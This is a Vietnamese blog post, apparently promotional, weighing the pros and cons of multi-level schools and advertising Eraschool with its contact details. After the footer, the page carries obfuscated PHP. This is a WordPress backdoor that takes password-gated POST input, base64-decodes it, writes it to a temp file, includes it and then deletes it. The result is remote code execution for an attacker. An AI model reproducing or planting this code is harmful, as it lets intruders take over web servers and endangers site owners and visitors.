Mô hình trường liên cấp có tốt cho sự phát triển của trẻ?

post

Lựa chọn môi trường học tập phù hợp là vô cùng cần thiết trên hành trình phát triển của trẻ. Hiện nay, bên cạnh các trường công lập, một số ba mẹ đang bắt đầu quan tâm hơn đến mô hình trường liên cấp. Vậy mô hình này có những ưu nhược điểm gì? Đây có thực sự là môi trường tốt cho sự phát triển của trẻ hay không? Ba mẹ có nên cho con theo học các trường xây dựng theo mô hình này không? Mời ba mẹ cùng theo dõi bài viết dưới đây nhé! 

Mô hình trường liên cấp là gì?

Trường liên cấp tạo điều kiện cho học sinh thường xuyên tham gia các lớp học thực hành 
Trường liên cấp tạo điều kiện cho học sinh thường xuyên tham gia các lớp học thực hành

Mô hình trường liên cấp là mô hình giáo dục gồm nhiều cấp học trong một nhà trường, thường nối liền từ Mầm non hoặc Tiểu học đến Trung học cơ sở và Trung học phổ thông. Với mô hình này, học sinh sau khi hoàn thành một cấp học sẽ được chuyển tiếp lên cấp tiếp theo trong cùng trường, giản lược rất nhiều thủ tục so với việc chuyển cấp và chuyển môi trường học thông thường. 

Một số đặc điểm thường thấy tại các trường theo mô hình này gồm: 

  • Triết lý giáo dục xuyên suốt các cấp học. 
  • Chương trình giảng dạy liền mạch, quy tắc tổ chức lớp học giống nhau. 
  • Chú trọng đào tạo ngoại ngữ tương tự các trường song ngữ, ngoài ra còn rèn luyện kỹ năng mềm bên cạnh bổ sung kiến thức. 
  • Phương pháp giảng dạy tiên tiến. 
  • Có sự đầu tư về cơ sở hạ tầng. 

Ưu – nhược điểm của loại trường này?

Trẻ được dạy kỹ năng bơi ngay tại trường học 
Trẻ được dạy kỹ năng bơi ngay tại trường học

Ưu điểm 

Với những đặc điểm cơ bản trên, mô hình trường học này mang đến nhiều ưu điểm cho quá trình học tập của trẻ như: 

  • Có sự thống nhất trong quá trình dạy và học giữa các cấp học trong nhà trường. Sự thống nhất này thể hiện ở môi trường, phương thức dạy và học cũng như lộ trình học tập. 
  • Học sinh dễ thích nghi và học tập hiệu quả hơn. Nguyên nhân là bởi khi học tập tại trường liên cấp, trẻ được chuyển tiếp lên bậc học liền kề ngay khi hoàn thiện chương trình học mà không phải thay đổi môi trường cũng như thực hiện thủ tục thi tuyển sinh phức tạp. 
  • Học sinh được chú trọng rèn luyện kỹ năng: Ngoài các tiết học bổ sung kiến thức lý thuyết trong chương trình, nhà trường cũng thường tổ chức nhiều lớp học thực hành và các hoạt động khám phá, trải nghiệm để tạo điều kiện cho trẻ phát triển bản thân. 

Nhược điểm 

Ngoài những ưu điểm trên, loại trường học này cũng mang một số nhược điểm mà ba mẹ cần cân nhắc sau đây: 

  • Học phí: Với chương trình giáo dục cả về kiến thức lý thuyết và kỹ năng, các trường theo mô hình này thường có mức học phí khá cao. Đây cũng là rào cản với những gia đình không có điều kiện tài chính. 

Có nên cho con học trường liên cấp không?

Trẻ được tham gia các lớp học thực hành tại Eraschool 
Trẻ được tham gia các lớp học thực hành tại Eraschool

Trên cơ sở cân nhắc những ưu nhược điểm mà mô hình trường học này mang lại, ba mẹ hoàn toàn có khả năng tự trả lời câu hỏi có nên cho con học trường hay không. Nếu có ý định đăng ký cho con học mô hình này, ba mẹ có thể tham khảo chương trình đào tạo ở Eraschool. Tại đây, trẻ có thể tham gia từ các lớp tiền tiểu học đến Tiểu học và Trung học cơ sở. Các lớp học không chỉ được tổ chức theo chương trình Cambridge mà còn được xây dựng theo nguyên tắc của mô hình trường học xanh: học từ thiên nhiên, học giữa thiên nhiên. Nhờ vậy, kết thúc chương trình học, trẻ không chỉ được tiếp thu tinh hoa chương trình giáo dục chuẩn quốc tế mà còn được rèn luyện nhiều kỹ năng cần thiết để trở thành một công dân toàn cầu. 

Hy vọng những chia sẻ về mô hình trường liên cấp trên đây có thể hỗ trợ ba mẹ phần nào trên hành trình tìm và lựa chọn môi trường học tập phù hợp cho con. Nếu còn thắc mắc gì liên quan đến mô hình dạy và học cũng như kỳ tuyển sinh 2022 của Eraschool, ba mẹ vui lòng liên hệ trực tiếp tới hotline 0899.889.818 để được tư vấn trong thời gian sớm nhất! 

Đông Cao, Tráng Việt, Mê Linh, Hà Nội

tuyensinh1@eraschool.edu.vn

0899 889 818

eraschool.edu.vn

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}